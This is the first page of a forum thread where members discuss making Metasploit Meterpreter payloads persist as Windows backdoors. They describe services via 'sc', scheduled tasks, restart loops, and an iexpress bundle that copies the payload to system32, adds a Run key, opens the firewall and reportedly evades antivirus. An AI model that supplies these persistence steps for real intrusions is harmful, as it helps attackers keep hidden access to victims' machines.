Page 1 of 3 123 LastLast
Results 1 to 10 of 29

Thread: Metasploit payloads as backdoors?

  1. #1
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    Default Metasploit payloads as backdoors?

    Hi there i hope people with programing knowledge or even just ruby knowledge read this.
    iv got this idea for metasploit payloads, why not implement then to have backdoor capabilities, like once exploited the payload you just used beds it self in to
    system32 dir,
    and reg,
    you no what i mean, i love meterpreter my self and im trying to accomplish this, its not easy for me because i have next to no knowledge of programing but im learning very fast, of the top of my head if i could get rid of that error message
    " blah blah has stoped woking"
    after you disconnect you could loop it so when you close the connection it re-opens a listener again, i dont no just trying so messaround a bit, i'm shaw aomeone has done it.
    please reply if you have anyideas,
    I would rather be hated for what i am,
    Then loved for what i am not.

  2. #2
    Junior Member
    Join Date
    Aug 2007
    Posts
    55

    Default

    You don't need programming skillz to do this.
    Once you have a shell you can download/install any program as a service backdoor, including metasploit payloads.
    (You probably know that you can generate metasploit "exe" payloads, right?)

    hint: the "sc" command in windows. I leave the rest of the fun up to you

  3. #3
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    Default

    yes i no how to do that, im not that noob, will sc command elimanate the error message?
    I would rather be hated for what i am,
    Then loved for what i am not.

  4. #4
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Metasploit backdoor?

    Am I right in thinking you just want to create a persistent backdoor on an exploited Windows host?

    If so, then barbsie is correct, the easiest way to do this will be to upload a backdoor executable, run it, and optionally use some sort of persistence mechanism to keep it running. If the backdoor executable itself keeps running and re-listens after disconnect (as would a nc listener using the -L "listen harder" switch) you only need to use a persistence mechanism if you want the backdoor to restart after a system reboot. If the backdoor executable doesn't re-listen after disconnect, you could write a batch file to keep restarting it.

    Regards restarting the backdoor after a system reboot...

    Windows has a number of ways to autostart programs at boot time - the SysInternals autoruns tool will show you where the great majority of these methods are. Use of Windows Services (which can be controlled by the "sc" command line tool mentioned by barbsie) is one of the easiest way to achieve this.

    However, there is a caveat with the use of Windows "Services" - it will kill programs after 30 seconds unless the program is written to respond to the Windows Service Control Managers API request to determine if the service is running correctly. You can get around this by using a tool to "servify" the command (using something such as the "ServifyThis" tool), or you could use a command prompt to spawn your executable in a new process (cmd.exe /k "command"). Alternatively, another method to start the process and keep it running is to use the task scheduler (at or schtasks from the command line).

    Be careful using persistent backdoors on a pen test - you will need to clean up after yourself when the test is done.

    If you really want to do this inside Metasploit, you're going to need to learn to write shellcode, and I don't think doing what you suggest would be particularly easy. Even if you do manage it, you will also lose access to your backdoor once the exploited process restarts (unless you modify the program binary - which is a whole other kettle of fish).
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  5. #5
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    Default

    yeah iv got meterpreter bind shellcode and put it in .c and compiled it, now is there any way to loop the process in C so you dont get the " met.exe has stoped working " message. or will i have to change the shell code, iv got backdoor that i made and work verry well but i like meterpreter, how can i work around this?
    I would rather be hated for what i am,
    Then loved for what i am not.

  6. #6
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default

    Quote Originally Posted by cr1spyj0nes View Post
    yeah iv got meterpreter bind shellcode and put it in .c and compiled it, now is there any way to loop the process in C so you dont get the " met.exe has stoped working " message. or will i have to change the shell code, iv got backdoor that i made and work verry well but i like meterpreter, how can i work around this?
    I just tried adding a while loop around the function calling shellcode in a C program (the Win32 Bind Shell from the Metasploit Shellcode page) and couldn't get it to work. Id suggest running the program from a batch file which keeps restarting it (as mentioned in my previous post).

  7. #7
    Member imported_Deathray's Avatar
    Join Date
    Oct 2007
    Posts
    381

    Default

    This is just a guess, but I think the reason metasploit has no persistent backdoor capabilities is maybe because of antivirus software.
    Try creating a meterpreter executable and upload it to www.virustotal.com. Last time I tried, I believe none of the products detected it.
    But that probably wouldn't stay the same if it had persistent capabilities.
    I don't know, what do the professionals say?
    But to the OP, one thing I like to do is from windows try going to start -> run -> iexpress.exe
    That program allows you to create a self extracting exe file which can silently execute a file once unzipped. So I like to compress a batch together with the meterpreter.exe and the batch file basically copies the meterpreter.exe to for example system32, and then adds a key value to "Run" which automatically starts meterpreter upon boot, and finally executes netsh firewall XXXX to allow the program through windows firewall. You configure the compressed .exe with iexpress.exe to execute the batch once compressed.
    The only disadvantage is that you have to remember the port it is set to listen on, because doing an nmap scan on the port meterpreter is listening on, will cause it to crash.
    So after a successful penetration, upload the compressed file and execute it - then you have permanent access.
    - Poul Wittig

  8. #8
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    Default

    but once you connect to it and disconect it print of an error message blah blah has stoped working?
    I would rather be hated for what i am,
    Then loved for what i am not.

  9. #9
    Member imported_Deathray's Avatar
    Join Date
    Oct 2007
    Posts
    381

    Default

    Quote Originally Posted by cr1spyj0nes View Post
    but once you connect to it and disconect it print of an error message blah blah has stoped working?
    Yes, unfortunately.
    I just found this, not sure if it will work, http://www.phreedom.org/software/metsvc/
    - Poul Wittig

  10. #10
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    Default

    yeah iv try'd that prog il try it ox xp but i dont think its working right tho,, or i cant work it,lol if any one has got this rogram workng please let me no ,,
    I would rather be hated for what i am,
    Then loved for what i am not.

Page 1 of 3 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •